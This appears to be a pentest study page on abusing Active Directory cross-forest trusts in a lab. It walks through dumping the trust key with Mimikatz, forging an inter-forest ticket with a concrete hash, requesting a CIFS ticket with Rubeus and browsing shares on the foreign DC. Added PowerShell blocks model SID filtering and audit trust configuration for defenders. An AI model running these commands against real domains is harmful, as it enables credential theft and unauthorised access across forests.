# Cross Forest

The following is the flow when a user in the dcorp domain wants to access a service in the eurocorp forest.

In step 4, we receive the inter-realm TGT, which is encrypted using the trust key. Once mcorp-dc decrypts the inter-realm TGT using the trust key, the user can request a TGS and then access the application server using that TGS.

<figure><img src="https://3740919960-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Am0a4hPyOcUCfhPUAm9%2Fuploads%2FwYQhLX4P7a4R35xEvGCq%2Fimage.png?alt=media&#x26;token=f99630f8-0cf2-47be-a10e-b481e1c944ef" alt=""><figcaption><p>Trust Flow across Forest</p></figcaption></figure>

Generally, it is not possible to escalate privileges across forests, because the forest is a security boundary: SID Filtering is applied (500 > 1000). The TGT would be accepted, but the SID would be filtered by the parent DC.

This means an Administrator of dcorp cannot access the DC of eurocorp or escalate to Enterprise Admin of eurocorp.
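To make the SID filtering rule concrete, here is an added example (not code from the original page) that models, in simplified form, what the trusting forest's DC does with the SIDs in an inter-forest ticket: a domain SID survives only if it belongs to a domain of the trusted forest and its RID is 1000 or above, so well-known RIDs such as 500 (Administrator) and 519 (Enterprise Admins) are stripped, as is any SID from the trusting forest itself. Only `S-1-5-21-...` domain SIDs are modelled; the dollarcorp SID is the one from the page, the other domain SIDs are constructed sample values, and the function names are mine.

```powershell
# Added example, not from the original page: a simplified model of the SID
# filtering the trusting forest's DC applies to the PAC of an inter-forest ticket.
# Only domain SIDs (S-1-5-21-...) are modelled.

# Domain SIDs the trusting forest (eurocorp) accepts from the trusted forest.
# Assumption: a forest-wide trust accepts every domain of the trusted forest;
# a quarantined trust would list only the directly trusted domain here.
$TrustedForestDomainSids = @(
    'S-1-5-21-719815819-3726368948-3917688648',  # dollarcorp (SID from the page)
    'S-1-5-21-1111111111-2222222222-3333333333'   # moneycorp root, constructed value
)

function Split-Sid {
    param([Parameter(Mandatory)][string]$Sid)
    # Splits 'S-1-5-21-a-b-c-RID' into its domain part and RID; $null for anything else.
    if ($Sid -match '^(S-1-5-21-\d+-\d+-\d+)-(\d+)$') {
        return [pscustomobject]@{ Domain = $Matches[1]; Rid = [uint32]$Matches[2] }
    }
    return $null
}

function Test-SidFiltered {
    param(
        [Parameter(Mandatory)][string]$Sid,
        [string[]]$AllowedDomainSids = $TrustedForestDomainSids
    )
    $parts = Split-Sid -Sid $Sid
    # Not a domain SID: outside this model, treated as dropped.
    if ($null -eq $parts) { return $true }
    # SID from a domain outside the trusted forest (for example the trusting
    # forest's own SID injected through SID history) is dropped.
    if ($AllowedDomainSids -notcontains $parts.Domain) { return $true }
    # Well-known RIDs below 1000 (500 Administrator, 512 Domain Admins,
    # 519 Enterprise Admins, ...) are stripped; RIDs of 1000 and above pass.
    return ($parts.Rid -lt 1000)
}

function Invoke-SidFilter {
    param(
        [Parameter(Mandatory)][string[]]$PacSids,
        [string[]]$AllowedDomainSids = $TrustedForestDomainSids
    )
    foreach ($s in $PacSids) {
        [pscustomobject]@{
            Sid      = $s
            Filtered = Test-SidFiltered -Sid $s -AllowedDomainSids $AllowedDomainSids
        }
    }
}

# Constructed PAC contents of a forged inter-forest ticket: the SIDs it claims.
$SamplePac = @(
    'S-1-5-21-719815819-3726368948-3917688648-500',   # dollarcorp Administrator  -> filtered
    'S-1-5-21-719815819-3726368948-3917688648-519',   # Enterprise Admins          -> filtered
    'S-1-5-21-719815819-3726368948-3917688648-1105',  # ordinary group, RID >= 1000 -> passes
    'S-1-5-21-3000000000-2000000000-1000000000-512'   # eurocorp's own SID (constructed) -> filtered
)

Invoke-SidFilter -PacSids $SamplePac | Format-Table -AutoSize
```

Run it as-is to see which claimed SIDs would reach the eurocorp side; swap in your own forest's domain SIDs for `$TrustedForestDomainSids` to reason about a specific trust.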

### Abusing Cross Forest Trusts

If there is a service on eurocorp that is accessible to dcorp admins, we can use the trust key to access that resource.

Once again, we require the trust key for the inter-forest trust, i.e., the trust between dcorp and eurocorp.

{% code overflow="wrap" %}

```powershell
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
```

{% endcode %}

Or

{% code overflow="wrap" %}

```powershell
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
```

{% endcode %}

An inter-forest TGT can then be forged with the trust key (passed as `/rc4:`) for the target forest:

{% code overflow="wrap" %}

```powershell
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:2756bdf7dd8ba8e9c40fe60f654115a0 /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\trust_forest_tkt.kirbi" "exit"
```

{% endcode %}
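Both steps above depend on a trust key that the trusting forest has not rotated and on how strictly that trust filters SIDs, so the defender-side check is an audit of the trust objects. The following is an added example (not code from the original page) that reads each `trustedDomain` object from a DC of the trusting forest, decodes its `trustAttributes` bits using the [MS-ADTS] names, reports the age of the trust account's password (that account, `<NetBIOS name>$`, holds the trust key) and flags the configurations that weaken SID filtering. It assumes the RSAT `ActiveDirectory` module and read access to the domain; the DC name is the page's lab name, the 30-day threshold is the default trust password rotation interval, and the function names are mine.

```powershell
# Added example, not from the original page: audit trusts of the trusting forest for
# relaxed SID filtering and stale trust keys. Requires the ActiveDirectory module.
Import-Module ActiveDirectory

# trustAttributes bit names as documented in [MS-ADTS].
$TrustAttributeBits = [ordered]@{
    0x1  = 'NON_TRANSITIVE'
    0x2  = 'UPLEVEL_ONLY'
    0x4  = 'QUARANTINED_DOMAIN'   # SID filtering: only SIDs of the trusted domain itself pass
    0x8  = 'FOREST_TRANSITIVE'
    0x10 = 'CROSS_ORGANIZATION'
    0x20 = 'WITHIN_FOREST'
    0x40 = 'TREAT_AS_EXTERNAL'    # relaxes SID filtering on a forest trust (SID history honoured)
    0x80 = 'USES_RC4_ENCRYPTION'
}

function ConvertTo-TrustAttributeNames {
    param([int]$Value)
    foreach ($bit in $TrustAttributeBits.Keys) {
        if ($Value -band $bit) { $TrustAttributeBits[$bit] }
    }
}

function Get-TrustAudit {
    param(
        [string]$Server = 'eurocorp-dc.eurocorp.local',  # a DC of the trusting forest (page's lab name)
        [int]$MaxTrustKeyAgeDays = 30                     # default trust password rotation interval; adjust to policy
    )
    $trusts = Get-ADObject -Server $Server -LDAPFilter '(objectClass=trustedDomain)' `
        -Properties trustPartner, flatName, trustDirection, trustAttributes

    foreach ($t in $trusts) {
        $attrs = @(ConvertTo-TrustAttributeNames -Value $t.trustAttributes)

        # The trust account <flatName>$ in this domain stores the trust key;
        # its pwdLastSet tells us when that key was last rotated.
        $acct = Get-ADObject -Server $Server -Properties pwdLastSet `
            -LDAPFilter "(&(objectClass=user)(sAMAccountName=$($t.flatName)`$))"
        $ageDays = if ($acct -and $acct.pwdLastSet) {
            [int]((Get-Date) - [DateTime]::FromFileTime($acct.pwdLastSet)).TotalDays
        } else { $null }

        $findings = @()
        if (('FOREST_TRANSITIVE' -in $attrs) -and ('TREAT_AS_EXTERNAL' -in $attrs)) {
            $findings += 'forest trust with SID filtering relaxed (SID history honoured)'
        }
        if (-not ('FOREST_TRANSITIVE' -in $attrs) -and -not ('WITHIN_FOREST' -in $attrs) -and
            -not ('QUARANTINED_DOMAIN' -in $attrs)) {
            $findings += 'external trust without SID filtering (quarantine off)'
        }
        if ($null -ne $ageDays -and $ageDays -gt $MaxTrustKeyAgeDays) {
            $findings += "trust key not rotated for $ageDays days"
        }

        [pscustomobject]@{
            TrustPartner    = $t.trustPartner
            Direction       = $t.trustDirection
            Attributes      = ($attrs -join ',')
            TrustKeyAgeDays = $ageDays
            Findings        = if ($findings.Count) { $findings -join '; ' } else { 'ok' }
        }
    }
}

Get-TrustAudit | Format-Table -AutoSize
```

Run it from a host with the AD module against a DC of the forest whose resources you are protecting; a `TREAT_AS_EXTERNAL` forest trust or a trust key far older than the rotation interval is what turns the ticket-forging steps above from a lab exercise into a live exposure.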

### Abuse with Rubeus

Using the same TGT we forged earlier, we request a TGS for CIFS on the eurocorp DC:

{% code overflow="wrap" %}

```powershell
Rubeus.exe asktgs /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt
```

{% endcode %}

With the TGS injected, we can access resources on the remote system:

{% code overflow="wrap" %}

```powershell
ls \\eurocorp-dc.eurocorp.local\SharedwithDCorp\
```

{% endcode %}

How do we enumerate which file shares are accessible to us?

{% code overflow="wrap" %}

```powershell
net view \\eurocorp-dc.eurocorp.local
```

{% endcode %}

But enumerating this way is not practical in the real world: for 100 machines, we cannot request 100 CIFS tickets and then run net view against each one.
